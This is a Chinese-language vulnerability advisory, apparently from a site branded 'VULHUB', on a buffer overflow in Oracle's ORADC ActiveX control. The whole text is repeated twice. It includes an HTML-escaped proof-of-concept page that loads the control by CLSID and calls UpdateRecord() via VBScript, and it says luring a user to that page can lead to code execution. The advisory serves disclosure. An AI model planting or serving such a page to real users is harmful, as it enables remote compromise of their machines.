VULHUB ™

Oracle ORADC是一款用于VB的Oracle ActiveX控件。 Oracle ORADC存在缓冲区溢出，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击，可能执行任意指令。 构建如下页面，诱使用户访问，可导致任意代码执行： &lt;!-- // CLSID: {EC4CF635-D196-11CE-9027-02608C4BF3B5} // Info: ORADC Control // ProgID: ORADC.ORADCCtrl.1 // InprocServer32: C:\\Oracle\\Ora81\\bin\\oradc.ocx --!&gt; &lt;html&gt; &lt;body&gt; &lt;OBJECT id=&quot;test&quot; WIDTH=445 HEIGHT=40 classid=&quot;clsid:EC4CF635-D196-11CE-9027-02608C4BF3B5&quot; &gt; &lt;/OBJECT&gt; &lt;script language=&quot;vbscript&quot;&gt; test.UpdateRecord() &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; Oracle Oracle Objects for OLE 目前没有解决方案： <a href="http://www.oracle.com/technology/tech/windows/ole/" target="_blank">http://www.oracle.com/technology/tech/windows/ole/</a>

Oracle ORADC是一款用于VB的Oracle ActiveX控件。 Oracle ORADC存在缓冲区溢出，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击，可能执行任意指令。 构建如下页面，诱使用户访问，可导致任意代码执行： &lt;!-- // CLSID: {EC4CF635-D196-11CE-9027-02608C4BF3B5} // Info: ORADC Control // ProgID: ORADC.ORADCCtrl.1 // InprocServer32: C:\\Oracle\\Ora81\\bin\\oradc.ocx --!&gt; &lt;html&gt; &lt;body&gt; &lt;OBJECT id=&quot;test&quot; WIDTH=445 HEIGHT=40 classid=&quot;clsid:EC4CF635-D196-11CE-9027-02608C4BF3B5&quot; &gt; &lt;/OBJECT&gt; &lt;script language=&quot;vbscript&quot;&gt; test.UpdateRecord() &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; Oracle Oracle Objects for OLE 目前没有解决方案： <a href="http://www.oracle.com/technology/tech/windows/ole/" target="_blank">http://www.oracle.com/technology/tech/windows/ole/</a>